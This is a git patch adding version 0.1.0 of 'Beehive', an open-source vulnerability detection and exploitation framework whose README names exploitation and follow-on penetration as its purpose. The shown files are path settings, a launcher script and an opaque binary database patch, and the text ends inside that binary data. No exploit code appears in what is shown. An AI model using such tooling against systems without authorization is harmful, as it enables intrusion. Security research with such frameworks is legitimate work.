From 348800f0f7ad53a6d14c68b31ea253c9263b63e1 Mon Sep 17 00:00:00 2001
From: evi1m0 <evi1m0.bat@gmail.com>
Date: Thu, 9 Jul 2015 16:39:51 +0800
Subject: [PATCH] Beehive Version 0.1.0

---
 .gitignore       |   5 +
 README.md        |  18 ++
 SETTINGS.py      |  28 +++
 __init__.py      |   0
 beehive.py       |  22 ++
 hive.db          | Bin 0 -> 175104 bytes
 menu.py          | 591 +++++++++++++++++++++++++++++++++++++++++++++++
 pocdb.json       | 172 ++++++++++++++
 requirements.txt |   6 +
 setup.py         |  74 ++++++
 10 files changed, 916 insertions(+)
 create mode 100755 SETTINGS.py
 create mode 100755 __init__.py
 create mode 100755 beehive.py
 create mode 100644 hive.db
 create mode 100755 menu.py
 create mode 100644 pocdb.json
 create mode 100755 requirements.txt
 create mode 100755 setup.py

diff --git a/.gitignore b/.gitignore
index ba74660..c56bb97 100644
--- a/.gitignore
+++ b/.gitignore
@@ -55,3 +55,8 @@ docs/_build/
 
 # PyBuilder
 target/
+
+# Beehive
+.DS_Store
+pocs/
+tmp/
diff --git a/README.md b/README.md
index 238a2ef..0126936 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,20 @@
 # Beehive
+
+Beehive 是一款基于 Beebeeto-framework 的开源安全漏洞检测利用框架，安全研究人员可以通过使用它快速的进行漏洞挖掘、漏洞利用、后续渗透等工作。
+
 Beehive is an open-source vulnerability detection framework based on Beebeeto-framework. Security researcher can use it to find vulnerability, exploits, subsequent attacks, etc.
+
+
+# Screenshots
+
+![http://docs.beebeeto.com/static/img/Screenshots_beehive_1.png](http://docs.beebeeto.com/static/img/Screenshots_beehive_1.png)
+
+# Documents
+
+- [http://docs.beebeeto.com/beehive/index.html](http://docs.beebeeto.com/beehive/index.html)
+
+# Developers
+
+- all@beebeeto.com
+- win2000@unknown.com
+- evi1m0.bat@gmail.com
\ No newline at end of file
diff --git a/SETTINGS.py b/SETTINGS.py
new file mode 100755
index 0000000..54acfb8
--- /dev/null
+++ b/SETTINGS.py
@@ -0,0 +1,28 @@
+import os
+import sys
+
+
+BASE_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__),
+                                         '..',
+                                         '..',))
+
+BEESCAN_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__),
+                                            '..',))
+
+FRAMEWORK_DIR = os.path.abspath(os.path.join(BASE_DIR,
+                                             'Beebeeto-framework',))
+
+POC_DIR = os.path.abspath(os.path.join(BEESCAN_DIR,
+                                        'pocs',))
+
+
+sys.path.extend([BASE_DIR, FRAMEWORK_DIR, POC_DIR])
+
+VERSION = '0.1.0'
+
+
+if __name__ == '__main__':
+    print BASE_DIR
+    print BEESCAN_DIR
+    print FRAMEWORK_DIR
+    print POC_DIR
diff --git a/__init__.py b/__init__.py
new file mode 100755
index 0000000..e69de29
diff --git a/beehive.py b/beehive.py
new file mode 100755
index 0000000..0f2c76d
--- /dev/null
+++ b/beehive.py
@@ -0,0 +1,22 @@
+#!/usr/bin/env python
+# coding: utf-8
+# site  : www.beebeeto.com
+# team  : n0tr00t security
+
+import sys
+import menu
+import SETTINGS
+
+from lib.exception import *
+
+def checkPythonVersion(major=2, minorLowest=6):
+    if sys.version_info.major != major or \
+       sys.version_info.minor < minorLowest:
+        errInfo = 'your python version is too low, version>=%d.%d.x '\
+                  'is needed.' % (major, minorLowest)
+        raise BeeScanLaunchException(errInfo)
+    return True
+
+if __name__ == '__main__':
+    mm = menu.MainMenu()
+    mm.cmdloop()
diff --git a/hive.db b/hive.db
new file mode 100644
index 0000000000000000000000000000000000000000..864f1eb0ae55b926fb323311d34486fe47b15db7
GIT binary patch
literal 175104
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
